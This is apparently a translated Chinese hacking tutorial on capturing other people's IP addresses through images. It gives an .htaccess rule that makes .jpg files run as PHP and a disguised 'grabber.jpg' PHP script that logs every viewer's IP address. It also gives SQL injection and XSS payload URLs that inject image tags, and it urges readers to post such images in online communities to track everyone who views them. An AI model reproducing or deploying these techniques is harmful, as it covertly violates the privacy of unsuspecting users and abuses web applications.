今天早上起牀之後,我看到一篇關於“使用sql注入語句獲取ip地址”的文章,對此我很感興趣,就仔細閱讀了一下,在讀完這篇文章之後,我有了一個新的想法:
通過對htaccess的利用,實現用一張照片獲取他人的ip地址。
在本教程中,我們將學習如何用一張照片來盜取ip地址。我的想法是通過修改.htaccess文件,將jpg文件當作php文件來解析。
下面就是我們需要向.htaccess中添加的代碼:
AddHandler application/x-httpd-php5 .jpg
然後將下面的代碼複製到記事本中,命名爲grabber.jpg
<?php
$fh = fopen('ip_list.txt', 'a');
fwrite($fh, $_SERVER['REMOTE_ADDR']."
");
fclose($fh);
$im = imagecreatefromjpeg("n00b.png");
header('Content-Type: image/jpeg');
imagejpeg($im);
imagedestroy($im);
?>
將grabber.jpg的權限設置爲755,然後再找一張照片,將其命名爲n00b.png,接着放到與grabber.jpg相同的目錄之中。
就這樣,一切工作就緒了。當別人瀏覽grabber.jpg這張照片的時候,他的ip地址就會被記錄下來。
(譯者注:需要把這些東西上傳至我們的個人網站空間中)
POC:
(譯者注:作者這裏貼了一張可獲取ip的演示照片,爲了大家的隱私,我沒有將其貼出,讀者可自行去作者博客查看)
至此,我們的照片已經可以開始工作了。
接着我還想說明一下如何使用SQLi來獲取ip地址。其實使用照片來盜取ip地址十分快捷,我們沒有理由去使用SQLi這種方法,但是爲了讓讀者獲取到更多的知識,我還是說明一下吧:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1' union select 1,0x3c696d67207372633d22687474703a2f2f6c65657474696d652e6e65742f6964696f74735f746573745f6c61622f696d61676569702f7472796d652e6a7067223e,3#
現在,再說一下如何使用xss來獲取ip地址:
http://leettime.net/xsslab1/chalg1.php?name=<img src="http://upload.chinaz.com/2016/0411/1460368129852.jpg" alt="通過照片獲取IP地址 SQL注入語句 SQL注入 SQL注入攻擊">&submit=Search
好了,就是這些了。
我們可以用這個技巧做許多有趣的事情,事實上大部分社區都允許我們發佈一些照片,所以我們可以用這個方法去獲取所有訪問到我們照片的人的ip地址。
謝謝您的閱讀,Happy Hacking!
注:相關網站建設技巧閱讀請移步到建站教程頻道。